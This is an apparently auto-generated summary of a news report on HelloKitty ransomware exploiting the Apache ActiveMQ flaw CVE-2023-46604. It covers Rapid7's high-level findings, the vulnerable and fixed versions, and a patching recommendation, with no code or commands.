November 2, 2023 at 12:23PM
HelloKitty ransomware is exploiting a critical Apache ActiveMQ flaw to breach networks and encrypt devices. The flaw allows attackers to execute arbitrary shell commands. Despite a security update being released, there are still thousands of internet-exposed servers using a vulnerable version. Rapid7 reported instances of threat actors exploiting the flaw to deploy HelloKitty ransomware. Administrators are urged to apply the available security updates to protect against this vulnerability.
Summary:
During a recent meeting, it was discussed that the HelloKitty ransomware operation is exploiting a vulnerability in Apache ActiveMQ. The flaw, known as CVE-2023-46604, is a critical severity remote code execution vulnerability that allows attackers to execute arbitrary shell commands. Although a security update was released on October 25, 2023, it was reported that as of October 30, there were still 3,329 internet-exposed servers that were vulnerable to exploitation.
Rapid7 has observed at least two instances where threat actors have exploited the vulnerability to deploy HelloKitty ransomware. HelloKitty ransomware is a malicious program that was launched in November 2020 and has recently had its source code leaked on cybercrime forums. The attacks began on October 27, two days after Apache released the security bulletin and fixes, suggesting that this is an n-day exploitation.
Rapid7 analyzed two MSI files disguised as PNG images, which contained a .NET executable that loads a base64-encoded .NET DLL called EncDLL. EncDLL is responsible for stopping specific processes, encrypting files, and appending the “.locked” extension to them. Several artifacts were found indicating the presence of these attacks, including atypical usage of Java.exe running with an Apache application and loading of remote binaries via MSIExec.
It is recommended that administrators apply the available security updates as soon as possible, as there are still thousands of vulnerable ActiveMQ instances. The vulnerable versions range from 5.15 to 5.18, and the fixed versions are 5.15.16, 5.16.7, 5.17.6, and 5.18.3. For more detailed information on indicators of compromise, the FBI report on the HelloKitty ransomware family is recommended.